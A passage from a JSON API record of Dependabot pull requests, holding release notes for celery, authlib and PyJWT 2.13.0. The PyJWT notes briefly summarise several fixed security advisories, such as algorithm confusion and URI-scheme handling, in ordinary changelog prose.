([#10159](https://github.com/celery/celery/issues/10159))\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt; \n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/3f4d8d795ad128bd7430cc5dc174a802cded425c\"\u003e\u003ccode\u003e3f4d8d7\u003c/code\u003e\u003c/a\u003e Prepare for release: v5.6.3 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10221\"\u003e#10221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a989e8cf8876274b1f0612abffeeb2e9995ed321\"\u003e\u003ccode\u003ea989e8c\u003c/code\u003e\u003c/a\u003e fix: clear the timer while catch the exception (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10218\"\u003e#10218\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d06de5f047620b0ea2bdbdb3c0c56137b79ae9a1\"\u003e\u003ccode\u003ed06de5f\u003c/code\u003e\u003c/a\u003e Chore(deps): Bump nick-fields/retry from 3 to 4 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10213\"\u003e#10213\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/c3c19c31dc3e21f16d4d85a8ba8401a9223ace09\"\u003e\u003ccode\u003ec3c19c3\u003c/code\u003e\u003c/a\u003e Fix: prioritize request ignore_result over task definition (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10184\"\u003e#10184\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d23be53f6f3600d48df35a797c63eb1c7d4d4b97\"\u003e\u003ccode\u003ed23be53\u003c/code\u003e\u003c/a\u003e Remove outdated autoreloader section from extending docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10154\"\u003e#10154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/ada2da7475a5fa9f9ad079149a5d6864634abc28\"\u003e\u003ccode\u003eada2da7\u003c/code\u003e\u003c/a\u003e docs: fix duplicated word in bootsteps comment\\n\\nSigned-off-by: Rohan Santho...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/f45f62beb3b16ae960944f8c97de13ccf15f2d0a\"\u003e\u003ccode\u003ef45f62b\u003c/code\u003e\u003c/a\u003e Add compression header to message protocol docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10156\"\u003e#10156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/9a270925546ed9d0ca0303fb5006edc86b705fd9\"\u003e\u003ccode\u003e9a27092\u003c/code\u003e\u003c/a\u003e docs: clarify after_return behavior for retried tasks (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10192\"\u003e#10192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/6ee6230cd80ef6c3e7482e1f4cd970fbb0629b23\"\u003e\u003ccode\u003e6ee6230\u003c/code\u003e\u003c/a\u003e Fix#9722 friendly status errors for CLI (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10190\"\u003e#10190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a9a2d4cecaf0e58c401ad6f68f022afa19770ac2\"\u003e\u003ccode\u003ea9a2d4c\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10186\"\u003e#10186\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v5.6.2...v5.6.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `authlib` from 1.6.9 to 1.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/authlib/authlib/releases\"\u003eauthlib's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix the readme links by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/886\"\u003eauthlib/authlib#886\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow non-recommended algorithms in ClientSecretJWT and PrivateKey by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/887\"\u003eauthlib/authlib#887\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate BCP47 language tags with a regex by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/873\"\u003eauthlib/authlib#873\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix RFC7523 signing with non RSA keys by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/884\"\u003eauthlib/authlib#884\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/authlib/authlib/compare/v1.7.1...v1.7.2\"\u003ehttps://github.com/authlib/authlib/compare/v1.7.1...v1.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix authlib.jose deprecation warning poping from _joserfc_helpers by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/881\"\u003eauthlib/authlib#881\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix redirecting to unvalidated \u003ccode\u003eredirect_uri\u003c/code\u003e on \u003ccode\u003eInvalidScopeError\u003c/code\u003e  in \u003ccode\u003eOpenIDImplicitGrant\u003c/code\u003e and \u003ccode\u003eOpenIDHybridGrant\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/authlib/authlib/compare/v1.7.0...v1.7.1\"\u003ehttps://github.com/authlib/authlib/compare/v1.7.0...v1.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAuthorization and token endpoints request empty scope parameter management by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/847\"\u003eauthlib/authlib#847\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport from Python 3.10 to 3.14 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/850\"\u003eauthlib/authlib#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow composition of AuthorizationServerMetadata by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/853\"\u003eauthlib/authlib#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake require_oauth parenthesis optional by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/855\"\u003eauthlib/authlib#855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eexpires_at\u003c/code\u003e behavior when its value is 0 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/854\"\u003eauthlib/authlib#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigration to joserfc by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/852\"\u003eauthlib/authlib#852\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRP-initiated logout by \u003ca href=\"https://github.com/frohrlich\"\u003e\u003ccode\u003e@​frohrlich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/849\"\u003eauthlib/authlib#849\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eget_jwt_config\u003c/code\u003e by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/858\"\u003eauthlib/authlib#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): Update PyPy version from 3.10 to 3.11 by \u003ca href=\"https://github.com/cclauss\"\u003e\u003ccode\u003e@​cclauss\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/863\"\u003eauthlib/authlib#863\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: remove \u0026quot;none\u0026quot; from default authlib.jose.jwt algorithms by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/860\"\u003eauthlib/authlib#860\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: normalize resolve_client_public_key method by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/861\"\u003eauthlib/authlib#861\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement rfc9700 PKCE downgrade countermeasure by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/864\"\u003eauthlib/authlib#864\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse correct syntax for tox.requires in tox.ini by \u003ca href=\"https://github.com/alex-ball\"\u003e\u003ccode\u003e@​alex-ball\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/868\"\u003eauthlib/authlib#868\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet client session User-Agent when fetching server metadata and JWKs by \u003ca href=\"https://github.com/alex-ball\"\u003e\u003ccode\u003e@​alex-ball\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/867\"\u003eauthlib/authlib#867\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: use the real application object for Flask by \u003ca href=\"https://github.com/nblock\"\u003e\u003ccode\u003e@​nblock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/869\"\u003eauthlib/authlib#869\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept the issuer URL as a valid audience by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/865\"\u003eauthlib/authlib#865\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't nest InvalidTokenError extra attribute by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/872\"\u003eauthlib/authlib#872\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocumentation overhaul by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/875\"\u003eauthlib/authlib#875\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate README.md docs.authli...\n\n_Description has been truncated_","html_url":"https://github.com/chandan0000/openstack/pull/9","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/chandan0000%2Fopenstack/issues/9","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/9/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-02T23:00:23.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4575558171","node_id":"PR_kwDOG5eEkc7h_9rI","number":904,"state":"open","title":"Bump pyjwt from 2.12.1 to 2.13.0","user":"dependabot[bot]","labels":["dependencies","python:uv"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T23:00:23.000Z","updated_at":"2026-06-02T23:03:49.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":null,"ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.12.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 